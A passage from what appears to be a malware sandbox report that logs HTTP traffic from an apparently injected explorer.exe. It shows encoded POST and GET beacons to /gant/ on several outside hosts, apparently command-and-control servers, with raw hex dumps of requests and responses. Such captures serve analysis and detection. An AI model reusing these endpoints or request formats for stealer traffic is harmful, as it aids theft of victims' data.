                                                                                                                  Data Ascii: OqjkVFkrs7pL84GP(KEGWU0nCj2zDxTfC2SpaUQ56iIn5XtQTikrzcLRI6LhDtpI3SE8cNJNcceebwEqgpfl4xLB3m4J~BHhlUzU9gNCBirhdN7dxY94RMT3ahgM7KeqQFKyL19RJE5T~xaWQrQOx6Q9Y6nZn3QY(8bgOPYjyW66YGVMvVy3fwpcDHf5DdtsCJBKjZVcUBTzvlrWovKbn5ozPndm1cLHUkMiJjClRNlUdYN5dfz
                                                                                                                  Feb 13, 2023 19:02:16.054809093 CET987OUTData Raw: 57 5f 54 72 49 7a 79 44 62 59 37 50 74 34 4c 6c 64 30 69 4f 50 44 6a 30 76 50 4a 30 39 2d 55 30 69 49 69 66 33 31 35 53 58 69 57 51 6c 6a 36 31 44 44 57 61 6f 49 54 2d 63 39 74 30 50 6c 4d 32 59 67 59 49 59 75 4d 39 33 36 76 4f 78 41 4d 6c 30 72
                                                                                                                  Data Ascii: W_TrIzyDbY7Pt4Lld0iOPDj0vPJ09-U0iIif315SXiWQlj61DDWaoIT-c9t0PlM2YgYIYuM936vOxAMl0r2bDoREhHKhKl~lPE~HwUEf0sMj9RHewX4jLi(MdsKMQnvJRAjdpyjFr6jdp5kWXwAzFCaSbZZRxUiNRw3tzvWia2(jTNV5C2ElLKUCOrGTMCTAMD(EJrbbSfEUjoyYYC0fPwDjafmIUq(QPKUcyWekn-oh3CmrSrA


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  38192.168.11.204988375.102.22.16880C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:02:18.572650909 CET988OUTGET /gant/?j-Jh9P=/4uePDAndv7VRKlxJSWWYF+9JWnpnxC+Pqu0glR/gWphXDvAzD/IhhQUyrVK/VMLXFR13n1QlAsq5EiJSOA8G9jIKMVd5okpcw==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.hotelyeah.top
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:02:18.724535942 CET989INHTTP/1.1 404 Not Found
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                  pragma: no-cache
                                                                                                                  content-type: text/html
                                                                                                                  content-length: 1238
                                                                                                                  date: Mon, 13 Feb 2023 18:02:18 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                                                                                  Feb 13, 2023 19:02:18.724596024 CET989INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                                                                                  Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  39192.168.11.2049885147.92.47.18280C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:02:24.585421085 CET997OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.cc564966.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.cc564966.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.cc564966.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 74 76 4f 52 50 4e 4a 7a 51 4b 54 5a 6e 4f 69 62 44 51 39 48 50 41 55 70 72 5a 77 44 4d 68 4f 70 7e 6b 39 4b 43 47 78 67 79 65 56 62 71 76 51 2d 57 71 62 68 79 54 68 38 50 41 68 69 5a 43 4d 4d 62 72 6e 72 75 74 7e 72 73 52 7e 2d 61 4e 32 48 74 43 72 4c 59 4e 38 4a 39 6d 41 62 74 79 30 5a 79 32 57 58 41 31 30 6e 65 52 76 41 6d 77 37 4a 74 7a 31 45 42 56 39 34 56 48 48 5a 65 51 42 52 38 37 54 33 64 6b 58 42 5a 41 36 46 38 46 43 4b 41 62 5a 7a 32 66 5a 72 7e 78 67 78 47 4f 55 51 69 6e 5a 6e 75 44 70 33 72 37 4f 62 6f 66 41 75 73 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=tvORPNJzQKTZnOibDQ9HPAUprZwDMhOp~k9KCGxgyeVbqvQ-WqbhyTh8PAhiZCMMbrnrut~rsR~-aN2HtCrLYN8J9mAbty0Zy2WXA10neRvAmw7Jtz1EBV94VHHZeQBR87T3dkXBZA6F8FCKAbZz2fZr~xgxGOUQinZnuDp3r7ObofAusQ).
                                                                                                                  Feb 13, 2023 19:02:24.878685951 CET999INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 13 Feb 2023 18:02:24 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Set-Cookie: SESSION=e7720c88-3b8f-48bf-b911-e0d42371c8c7; Path=/; HttpOnly; SameSite=Lax
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 34 34 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 55 4b 8f e3 44 10 3e 67 7e 45 e3 d5 68 67 20 1e 3b 99 64 1e 1e 27 52 9e bb 21 3b c9 ce e4 b1 64 10 87 8e dd b1 5b b1 dd a6 dd ce 63 56 48 2b 0e 88 0b 07 6e 48 3c 24 38 71 41 e2 b2 d2 0a c4 af 61 22 e0 5f d0 dd 76 66 3c 68 58 41 12 3b ee aa ea aa af be 2a 57 9b ef 34 fb 8d e1 e4 79 0b 3c 1d 9e 3f 03 cf 47 f5 67 9d 06 50 54 4d 7b 71 d8 d0 b4 e6 b0 99 28 4a 07 7a 01 0c 29 0c 22 cc 30 09 a0 a7 69 ad 9e 52 dd 31 5d e6 7b e2 0f 41 bb ba 93 33 7d c4 20 70 19 0b 55 f4 71 8c 17 15 a5 41 02 86 02 a6 0e d7 21 52 80 95 ac 2a 0a 43 2b a6 89 bd 67 c0 72 21 8d 10 ab 8c 86 6d f5 44 01 5a 75 07 f0 8f c9 30 f3 50 b5 a4 97 d4 3f 7e fb 72 f3 ed ab 9b 37 5f 6c 7e fa 6a f3 cd 8f a6 96 a8 76 72 db 78 01 f4 51 45 a1 64 4a 58 94 89 11 90 19 f1 3c b2 e4 30 1f 00 16 52 e8 f8 f0 9e b9 6a 41 cb 45 0f 9b 4b 95 2a f0 53 e2 fd e7 5d 68 15 62 8a b2 a0 f4 87 dd cf d1 7a 49 a8 9d b5 4c 45 85 7c fa 50 dc 3e 1c 3e ec c2 46 91 45 71 28 ca 93 c1 37 74 71 04 f8 cf 5f 83 10 3a 32 39 ce 46 c4 d6 9c dc 9d 5c ee dd 97 fc 96 f3 21 75 70 60 e8 67 62 11 42 db c6 81 93 ac 3e e1 92 29 b1 d7 d2 6c c6 b3 57 67 d0 c7 de da 00 8f 6b b1 8d c9 12 db e8 71 1e 58 31 8d f0 02 e5 01 a4 18 7a 79 e0 22 6f 81 18 b6 60 1e 44 bc 67 d4 08 51 3c 93 de a7 d0 9a 3b 94 c4 81 6d c4 d4 db b3 21 83 06 f6 39 32 2d 0c 9c b3 29 8c d0 51 29 8f c7 f5 fe e5 52 ef 3e 71 48 8d 7f 7a 83 91 db 1a 39 e2 51 ae bb 8d da 84 3f 37 7a e7 d1 7b a7 42 3a 6a 79 ad 8b f1 c5 64 5c ec cd 27 4f 6a cb 7a dc bd be a8 2d 9b 9d 66 a9 43 3a ce aa 83 e7 b5 f3 ab 56 81 5c e2 1a ad 37 ed ab fa a0 77 de f9 80 bc 8f db d3 e6 d5 a4 d9 b5 06 7e a3 3f c1 7e 33 ee 0d c6 dd ce f5 65 6f 42 47 93 7e 3b be 70 96 88 5c 4d 3b 64 e5 10 c4 83 5b b5 96 35 7f 51 28 3c 1d 0f 67 96 08 5d 1b 8c c6 fd cb 6e b9 31 e9 74 2a fb 80 a2 10 41 f6 8f 4c 79 db 78 84 1a 8f 8a 05 f1 95 ca 44 b2 74 31 43 72 2d a9 8d f0 35 32 40 e1 24 5c 49 59 5a 08 95 b7 35 23 be 51 d4 13 b9 28 c9 01 a2 94 50 ee d7 46 2f 45 cd ee 57 a6 41 11 0a 23 86 e8 ff aa 4c 06 42 51 4f 63 e5 12 9c e0 0e 68 2a a0 ce 14 ee 15 cb e5 3c b8 bb e9 07 a7 27 fb 12 39 ef 0a e6 1a a0 ac ef ca a5 78 d9 55 e8 61 27 30 00 c5 8e 9b f0 93 34 9d ca 48 c8 2d 33 86 91 0b 6d b2 e4 b2 70 25 2f 37 f2 f6 f4 3c d0 77 45 ac dd 24 c0 cc 23 90 19 c0 43 33 e9 4b 52 12 10 de 9c a2 b1 24 23 29 84 d2 71 e2 39 dd f0 d6 e8 19 02 ca ff 9a bf cc 65 0b b1 c8 21 8a 4b 40 cd c0 3c 2a a4 30 b7 15 94 39 1e 67 eb 67 79 08 d2 a4 74 32 95 80 04 49 23 48 85 c1 4b ee 0a ea 64 62 e9 d0 94 d6 19 2a 2d 3e 56 11 15 56 39 0f 07 48 75 91 a0 d6 00 87 99 38 38 08 63 f6 21 e3 b3 b7 22 76 7e 24 7d 4c f9 a0 41 d4 90 88 8b a5 e3 3c 38 39 e5 dc 1e 17 77 f7 41 44 3c 6c 83 42 da 80 24 66 c2 b3 01 6e d1 6d 67 83 cc f8 30 35 cb f0 56 38 4a 65 49 0c 95 42 1b c7 91 01 d2 96 16 e9 c0 bb 3c 6c 64 11 0a c5 c0 ca 84 48 1b ec d1 69 ab d1 6c b7 65 7a f7 38 e7 d9 01 71 09 de 6f db 52 3a 36 5c b2 40 09 a9 89 93 8c 9a cf 3c 2d 1d 7a a6 96 1c 56 a6 98 6b 7c 06 72 55 08 2c 0f 46 51 45 b9 7b ad c4 8c cd f1 d3 47 6c 0c c5 01 72 6b
                                                                                                                  Data Ascii: 446UKD>g~Ehg ;d'R!;d[cVH+nH<$8qAa"_vf<hXA;*W4y<?GgPTM{q(Jz)"0iR1]{A3} pUqA!R*C+gr!mDZu0P?~r7_l~jvrxQEdJX<0RjAEK*S]hbzILE|P>>FEq(7tq_:29F\!up`gbB>)lWgkqX1zy"o`DgQ<;m!92-)Q)R>qHz9Q?7z{B:jyd\'Ojz-fC:V\7w~?~3eoBG~;p\M;d[5Q(<g]n1t*ALyxDt1Cr-52@$\IYZ5#Q(PF/EWA#LBQOch*<'9xUa'04H-3mp%/7<wE$#C3KR$#)q9e!K@<*09ggyt2I#HKdb*->VV9Hu88c!"v~$}LA<89wAD<lB$fnmg05V8JeIB<ldHilez8qoR:6\@<-zVk|rU,FQE{Glrk
                                                                                                                  Feb 13, 2023 19:02:24.878762960 CET999INData Raw: 73 db 67 4a b5 47 98 39 a5 5a b5 2d da 2e b5 b3 f1 62 eb 4d d6 52 a9 9a 1a 97 09 17 59 55 72 10 6e a3 88 33 ee af ef 5f ff f9 fa e7 9b 37 3f dc fc f2 d9 ef af 3e e5 e1 a5 6f 93 9f a7 14 cd 2a 8a a6 54 37 5f 7f b7 f9 9c 9b fc ca 6d 4d 0d 0a 9f 89
                                                                                                                  Data Ascii: sgJG9Z-.bMRYUrn3_7?>o*T7_mMoSKo0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  4192.168.11.2049843217.160.0.3780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:00:02.697614908 CET446OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.grenoble-informatique.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.grenoble-informatique.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.grenoble-informatique.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 37 4c 6a 58 42 39 4a 61 38 36 65 70 50 77 74 69 33 4e 30 61 45 66 55 46 68 30 43 37 44 5a 67 6e 52 70 6d 6b 28 32 69 52 48 6c 30 61 6f 55 51 49 76 6c 6a 69 68 74 56 4c 46 55 52 70 54 5a 6f 57 47 72 4a 41 6d 61 72 44 63 50 4b 6a 7e 74 78 64 47 50 49 76 36 65 70 38 79 32 56 6c 61 76 49 5f 44 48 42 58 6c 37 46 46 64 73 7e 42 53 73 32 6c 7a 35 4a 57 71 74 73 59 43 4f 66 62 75 51 59 4a 4d 66 48 61 31 53 6d 7a 4e 45 48 57 36 36 46 74 55 45 54 73 73 6e 39 58 54 71 6b 51 68 34 77 48 52 73 6f 44 4f 72 4e 4b 70 39 4e 6e 47 65 74 65 33 78 74 78 35 62 42 41 53 52 66 4f 6f 48 65 52 4d 63 56 58 45 61 33 32 54 44 46 59 33 48 6b 55 4f 30 77 56 7e 45 37 64 64 62 61 39 42 79 71 72 66 44 4e 50 6f 64 31 55 48 42 36 35 49 47 4e 43 62 6a 58 6f 33 6a 33 4f 68 6f 53 61 77 62 64 31 36 67 68 33 38 79 4f 58 41 65 49 6e 74 57 37 30 69 4c 71 49 51 39 66 36 51 4b 6e 30 6a 66 33 4e 41 66 7a 66 62 61 79 39 52 48 71 73 42 34 36 4a 41 6d 70 35 6a 66 6a 33 74 59 36 5a 76 35 6b 32 48 34 68 76 6d 6f 35 70 6b 67 6a 58 76 79 79 32 38 47 35 6f 32 53 78 47 77 71 34 45 41 6b 50 34 4e 71 59 6b 51 42 57 68 61 46 75 6f 6f 67 69 48 64 58 39 38 70 38 66 38 78 73 58 4a 6b 56 43 48 6f 42 72 45 41 65 70 67 49 67 77 74 47 6a 50 4d 64 37 59 6b 55 46 28 45 67 76 78 44 28 4a 52 38 70 4e 6f 32 77 52 56 5a 38 67 6a 5a 66 68 54 6d 78 43 76 76 72 48 38 50 45 56 72 4b 71 5a 39 5f 37 75 37 73 54 38 76 36 4b 5a 49 61 54 58 7a 79 6d 77 55 41 49 37 65 57 65 77 33 33 38 44 56 4a 44 69 47 6d 50 48 66 38 35 6c 44 48 70 4a 58 49 59 72 6b 4b 71 44 49 35 36 73 56 43 45 41 41 42 33 65 51 64 74 56 59 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=7LjXB9Ja86epPwti3N0aEfUFh0C7DZgnRpmk(2iRHl0aoUQIvljihtVLFURpTZoWGrJAmarDcPKj~txdGPIv6ep8y2VlavI_DHBXl7FFds~BSs2lz5JWqtsYCOfbuQYJMfHa1SmzNEHW66FtUETssn9XTqkQh4wHRsoDOrNKp9NnGete3xtx5bBASRfOoHeRMcVXEa32TDFY3HkUO0wV~E7ddba9ByqrfDNPod1UHB65IGNCbjXo3j3OhoSawbd16gh38yOXAeIntW70iLqIQ9f6QKn0jf3NAfzfbay9RHqsB46JAmp5jfj3tY6Zv5k2H4hvmo5pkgjXvyy28G5o2SxGwq4EAkP4NqYkQBWhaFuoogiHdX98p8f8xsXJkVCHoBrEAepgIgwtGjPMd7YkUF(EgvxD(JR8pNo2wRVZ8gjZfhTmxCvvrH8PEVrKqZ9_7u7sT8v6KZIaTXzymwUAI7eWew338DVJDiGmPHf85lDHpJXIYrkKqDI56sVCEAAB3eQdtVY.
                                                                                                                  Feb 13, 2023 19:00:02.717006922 CET447INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Date: Mon, 13 Feb 2023 18:00:02 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  40192.168.11.2049886147.92.47.18280C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:02:27.375663042 CET1000OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.cc564966.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.cc564966.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.cc564966.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 74 76 4f 52 50 4e 4a 7a 51 4b 54 5a 6e 75 53 62 41 33 68 48 4f 67 55 75 32 70 77 44 48 42 4f 74 7e 6b 78 4b 43 43 4a 4a 79 4e 68 62 71 4e 59 2d 45 62 62 68 78 54 68 38 42 67 68 6e 54 69 4d 62 62 73 75 63 75 73 53 72 73 52 61 2d 49 50 75 48 72 79 72 4d 53 74 38 4f 74 32 41 61 70 79 30 70 79 32 61 4c 41 78 38 6e 65 41 58 41 6e 32 58 4a 70 69 31 48 4c 56 39 36 45 58 48 59 48 67 42 68 38 37 66 46 64 68 54 33 59 32 79 46 39 6b 69 4b 42 62 5a 77 6a 66 5a 67 79 52 68 69 58 75 4e 4a 6a 32 6c 6b 36 68 35 56 30 59 54 75 68 65 30 69 39 69 79 4c 78 75 62 70 53 31 32 44 48 75 73 5a 51 36 41 36 66 30 7a 73 34 51 68 56 50 74 52 50 6f 31 58 4d 45 73 30 63 4d 79 51 71 79 34 68 47 69 31 56 4c 55 57 70 72 36 30 6e 45 56 63 76 6b 78 49 7a 33 38 44 4b 59 33 5a 7e 61 31 77 43 32 7a 35 51 58 6c 76 78 30 6e 47 4f 66 6c 72 66 5a 54 75 50 4f 6e 51 78 58 76 57 42 66 73 7a 68 6d 49 45 4b 77 57 35 76 74 4b 75 50 5a 52 65 75 57 6a 39 70 2d 49 51 30 74 34 37 6f 43 4e 52 66 63 4c 46 33 7a 35 39 52 66 34 72 6a 79 6c 42 31 42 6a 61 36 43 55 67 45 6e 70 57 33 50 42 56 51 35 6e 30 35 6c 46 58 52 58 74 63 54 65 6b 45 4d 4a 45 30 44 6c 58 46 38 61 68 37 66 46 35 5f 4d 37 73 72 7a 49 6b 4b 4d 43 28 4a 36 64 74 36 6d 52 55 76 50 62 7a 5a 64 71 28 79 6c 79 35 63 73 7a 75 68 66 30 41 46 49 6d 48 68 46 52 61 50 30 7a 4a 50 61 34 69 47 65 75 6a 36 43 72 48 6c 38 42 4b 58 53 48 43 78 52 69 47 74 42 4e 72 7a 42 68 44 61 4e 39 50 36 76 5a 52 77 6c 38 6e 47 37 32 51 37 57 6e 35 66 4a 49 51 59 4c 69 78 2d 43 37 6d 73 4c 39 35 6f 69 43 42 55 55 74 6d 5f 57 35 52 36 38 73 57 30 6f 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=tvORPNJzQKTZnuSbA3hHOgUu2pwDHBOt~kxKCCJJyNhbqNY-EbbhxTh8BghnTiMbbsucusSrsRa-IPuHryrMSt8Ot2Aapy0py2aLAx8neAXAn2XJpi1HLV96EXHYHgBh87fFdhT3Y2yF9kiKBbZwjfZgyRhiXuNJj2lk6h5V0YTuhe0i9iyLxubpS12DHusZQ6A6f0zs4QhVPtRPo1XMEs0cMyQqy4hGi1VLUWpr60nEVcvkxIz38DKY3Z~a1wC2z5QXlvx0nGOflrfZTuPOnQxXvWBfszhmIEKwW5vtKuPZReuWj9p-IQ0t47oCNRfcLF3z59Rf4rjylB1Bja6CUgEnpW3PBVQ5n05lFXRXtcTekEMJE0DlXF8ah7fF5_M7srzIkKMC(J6dt6mRUvPbzZdq(yly5cszuhf0AFImHhFRaP0zJPa4iGeuj6CrHl8BKXSHCxRiGtBNrzBhDaN9P6vZRwl8nG72Q7Wn5fJIQYLix-C7msL95oiCBUUtm_W5R68sW0o.
                                                                                                                  Feb 13, 2023 19:02:27.666691065 CET1002INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 13 Feb 2023 18:02:27 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
